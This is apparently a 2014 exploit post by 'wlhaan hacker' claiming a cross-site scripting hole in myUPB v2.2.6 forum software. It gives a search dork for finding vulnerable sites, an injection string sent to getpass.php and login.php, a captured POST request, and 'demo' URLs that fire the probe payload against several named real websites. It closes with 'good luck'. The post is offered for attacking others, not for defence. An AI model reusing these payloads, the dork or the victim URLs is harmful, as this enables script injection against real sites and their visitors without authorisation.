facebook facebook twitter rss

myUPB v2.2.6 -Cross Site Scripting(XSS)

Author: wlhaan hacker , Published: 24-10-2014
                         ||          ||   | ||

o_,_7 _|| . _o_7 _|| 4_|_|| o_w_,

( : / (_) / ( .

|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|

| _ __ __ __ ______ |

| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ |

| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ |

| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ |

| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |

| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ |

| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ |

| \ \____/ >> team wlhaan hacker |

| \/___/ |

| |

|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|





_____________________________________________________

myUPB v2.2.6 -Cross Site Scripting(XSS)



#####################################################

# [+] Author : wlhaan hacker #

# [+] Email : iit@HoTMaiL.coM #

# [+] Site script : http://forum.myupb.com/// #

# [+] team wlhaan Hacker #

# [+] Dork : Powered by myUPB v2.2.6

#####################################################

Exploit:

http://server/path/getpass.php

or
http://server/path/login.php

POC
POST /Forum/getpass.php [u_name=Joey.htaccess.aspx-->">'>'" ]

POST /Forum/getpass.php HTTP/1.1
Content-Length: 70
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Host: www.uninga.de
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Vega/1.0
Cookie: PHPSESSID=ok0u08063dqa2n4sftvt54phb2; lastvisit=1413729748; timezone=0
Cookie2: $Version=1








# [+] DEMO



http://www.josegarcialawncare.com/mboard/login.php?ref=null.htaccess.aspx--%3E%22%3E%27%3E%27%22%3Cvvv000011v178410%3E

http://www.uninga.de/Forum/login.php?ref=null.htaccess.aspx--%3E%22%3E%27%3E%27%22%3Cvvv000011v178410%3E

http://superbowl.no/forum/login.php?ref=null.htaccess.aspx--%3E%22%3E%27%3E%27%22%3Cvvv000011v178410%3E



http://dc.roosamanna.ee/search.php?q=1.htaccess.aspx--%3E%22%3E%27%3E%27%22%3Cvvv000035v178410%3E&user=name&req=1&forums_req=1&intopic=on


just use your mind

and good luck :D



miss to : shooq hacker ..



#####################################################

Discovered By : wlhaan hacker



https://twitter.com/waleedal3ybani



https://www.facebook.com/waleed.alaibani

#####################################################

Like us on Facebook :